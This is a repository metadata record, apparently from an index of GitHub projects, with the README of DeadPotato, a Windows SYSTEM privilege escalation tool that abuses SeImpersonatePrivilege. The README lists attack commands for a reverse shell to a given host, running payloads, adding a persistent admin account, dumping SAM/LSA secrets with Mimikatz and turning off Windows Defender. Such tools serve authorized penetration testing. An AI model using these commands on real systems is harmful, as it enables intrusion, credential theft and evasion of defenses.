{"id":25405942,"url":"https://github.com/lypd0/DeadPotato","last_synced_at":"2025-10-31T01:31:52.642Z","repository":{"id":251050287,"uuid":"836004381","full_name":"lypd0/DeadPotato","owner":"lypd0","description":"DeadPotato is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream.","archived":false,"fork":false,"pushed_at":"2024-08-17T06:08:29.000Z","size":1634,"stargazers_count":224,"open_issues_count":0,"forks_count":31,"subscribers_count":4,"default_branch":"master","last_synced_at":"2024-08-17T07:23:49.800Z","etag":null,"topics":["deadpotato","godpotato","potato","privesc","privilege-escalation","reverse-shell","seimpersonateprivilege","skull","windows"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lypd0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-07-31T01:08:30.000Z","updated_at":"2024-08-17T06:08:32.000Z","dependencies_parsed_at":"2024-08-04T16:25:38.035Z","dependency_job_id":"3a713a74-0227-44c4-a8d3-e47b0aa4cb7a","html_url":"https://github.com/lypd0/DeadPotato","commit_stats":null,"previous_names":["lypd0/deadpotato"],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lypd0%2FDeadPotato","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lypd0%2FDeadPotato/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lypd0%2FDeadPotato/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lypd0%2FDeadPotato/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lypd0","download_url":"https://codeload.github.com/lypd0/DeadPotato/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239088377,"owners_count":19579434,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["deadpotato","godpotato","potato","privesc","privilege-escalation","reverse-shell","seimpersonateprivilege","skull","windows"],"created_at":"2025-02-16T05:03:16.311Z","updated_at":"2025-10-31T01:31:45.789Z","avatar_url":"https://github.com/lypd0.png","language":"C#","readme":"![image](https://github.com/user-attachments/assets/460525cb-1871-4608-a6e5-1c5da07f63aa)\n\n\u003cp align=\"center\"\u003e\n \u003ca href=\"#\"\u003e\u003cimg alt=\"forksBDG\" src=\"https://img.shields.io/github/forks/lypd0/DeadPotato?style=for-the-badge\"\u003e\u003c/a\u003e\n \u003ca href=\"#\"\u003e\u003cimg alt=\"starsBDG\" src=\"https://img.shields.io/github/stars/lypd0/DeadPotato?style=for-the-badge\"\u003e\u003c/a\u003e\n \u003ca href=\"#\"\u003e\u003cimg alt=\"licenseBDG\" src=\"https://img.shields.io/github/license/lypd0/DeadPotato?style=for-the-badge\"\u003e\u003c/a\u003e\n \u003ca href=\"#\"\u003e\u003cimg alt=\"languageBDG\" src=\"https://img.shields.io/badge/LANGUAGE-CSHARP-green?style=for-the-badge\"\u003e\u003c/a\u003e\n\n\u003ch3 align=\"center\"\u003e🚨 Hashdump \u0026 SharpHound Modules Now Available! 🚨\u003c/h3\u003e\n\u003ch4 align=\"center\"\u003e\u003ci\u003e❗ Usage of this program under an unauthorized context is strictly forbidden. The author(s) of DeadPotato do not take any responsibility for any harm caused to systems. Use with caution. ❗\u003c/i\u003e\u003c/h4\u003e\n\n```\nC:\\Users\\lypd0\u003e GodPotato.exe\n \n ⠀⢀⣠⣤⣤⣄⡀⠀ _ _\n ⣴⣿⣿⣿⣿⣿⣿⣦ | \\ _ _ _||_) _ _|_ _ _|_ _\n ⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_)\n ⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0\n ⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =-\n ⠈⠁⠀⠀⠀\n\n_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_\n\n (*) Example Usage(s):\n\n -={ deadpotato.exe -MODULE [ARGUMENTS] }=-\n\n -\u003e deadpotato.exe -cmd \"whoami\"\n -\u003e deadpotato.exe -rev 192.168.10.30:9001\n -\u003e deadpotato.exe -exe paylod.exe\n -\u003e deadpotato.exe -newadmin lypd0:DeadPotatoRocks1\n -\u003e deadpotato.exe -shell\n -\u003e deadpotato.exe -mimi sam\n -\u003e deadpotato.exe -defender off\n -\u003e deadpotato.exe -sharphound\n\n (*) Available Modules:\n\n - cmd: Execute a command as NT AUTHORITY\\SYSTEM.\n - rev: Attempts to establish a reverse shell connection to the provided host\n - exe: Execute a program with NT AUTHORITY\\SYSTEM privileges (Does not support interactivity).\n - newadmin: Create a new administrator user on the local system.\n - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)\n - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)\n - defender: Either enables or disables Windows Defender's real-time protection.\n - sharphound: Attempts to collect domain data for BloodHound.\n```\n\n## ❔ Quick Start - How To Use\nThe `SeImpersonatePrivilege` right is enabled in your context? With **DeadPotato**, it is possible to achieve maximum privileges on the local system.\u003cbr\u003e\u003cbr\u003e\nThe tool will attempt to start an elevated process running in the context of the `NT AUTHORITY\\SYSTEM` user by abusing the DCOM's RPCSS flaw in handling OXIDs, allowing unrestricted access over the machine for critical operations to be freely performed.\u003cbr\u003e\u003cbr\u003e\n⚠️ In the following case, the `-cmd` module is used. Many modules are available for use, such as the `-rev IP:PORT` for spawning an elevated reverse shell, `-newadmin usr:pass` for creating a new local Administrator user for persistence, or `-mimi sam` for dumping SAM hashes.\n\n![cmd_GQJhLcT9IH](https://github.com/user-attachments/assets/b5f71f4a-f8bc-4099-81c5-54bcece7abb6)\n\n#### Verify SeImpersonatePrivilege rights\nIn order to use DeadPotato, the SeImpersonatePrivilege right must be enabled in the current context. In order to verify this, the `whoami /priv` command can be executed.\nIf there privilege is disabled, exploitation is not possible in the current context.\n```\nC:\\Users\\lypd0\u003e whoami /priv\n\n\u003c...SNIP...\u003e\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\n\u003c...SNIP...\u003e\n```\n\n\n## 🐚 Getting an Elevated Reverse Shell\n![cmd_XQASCL7Lz6](https://github.com/user-attachments/assets/201fa7cb-4253-47e4-8beb-1ae781fc481c)\n\n### 🏅 Credits\nThis Project \"DeadPotato\" is a tool built on the source code of the masterpiece \"GodPotato\" by BeichenDream.\nIf you like this project, make sure to also go show support to [the original project](https://github.com/BeichenDream/GodPotato)\n\nBeichenDream,\nBenjamin DELPY `gentilkiwi`,\nBloodHound Developers.\n\n### License\nThis project is licensed under the [Apache 2.0 License](https://choosealicense.com/licenses/apache-2.0/). Please review the LICENSE file for more details.\n\n\n[![Star History Chart](https://api.star-history.com/svg?repos=lypd0/DeadPotato\u0026type=Date)](https://star-history.com/#lypd0/DeadPotato\u0026Date)\n","funding_links":[],"categories":["C# #"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flypd0%2FDeadPotato","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flypd0%2FDeadPotato","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flypd0%2FDeadPotato/lists"}